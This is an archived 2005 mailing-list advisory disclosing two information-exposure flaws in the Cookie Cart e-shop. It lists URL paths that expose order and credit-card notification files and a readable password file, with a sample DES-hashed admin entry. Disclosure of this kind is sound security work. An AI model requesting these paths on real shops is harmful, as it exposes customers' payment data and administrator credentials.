lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 21 May 2005 20:15:48 -0300
From: SoulBlack Group <soulblacktm@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	news@...uriteam.com, sec@...lblack.com.ar, bugs@...uritytracker.com,
	submissions@...ketstormsecurity.org, vuln@...unia.com,
	alerts_advisories@...-security.org
Subject: Cookie Cart Default Installation Multiple Vulnerabilities


============================================================

============================================================
Title: Cookie Cart Default Installation Multiple Vulnerabilities 
Vendor: http://www.metromkt.net/ccart
Vulnerability discovery: SoulBlack - Security Research - 
http://soulblack.com.ar 
Date: 21/05/2005
Severity: Medium. Remote users can obtain several data of Credits Cards, etc.
Affected version: Unknow
============================================================

============================================================

* Summary *

Cookie Cart Shopping is a Simple E-Shop Commerce.

-------------------------------------------------------------

* Problem Description *

Remote user can obtain Admin password and see Confidential (asi se
escribe ??) Information

-------------------------------------------------------------


* First Vulnerability *


You can see "Order Notification" list with testmy.cgi and testmy.pl

http://www.vulnerable.com/cart/cgi/testmy.cgi?testmycgi=/cart/cgi/testmy.cgi&path=/cart/dbase_ven/&run=yes

http://www.vulnerable.com/cart/dbase_ven/[vendor_#number-notification.txt]

Example:

http://www.vulnerable.com/cart/dbase_ven/vendor_10112088.txt


* Second Vulnerability *


You can read Password File (DES Encryption)

http://www.vulnerable.com/cart/data/passwd.txt

Example:

admin:aeczIj3e6GLso

-------------------------------------------------------------

* Fix *

  Use .htaccess or contact Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/cookiec_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar


Powered by blists - more mailing lists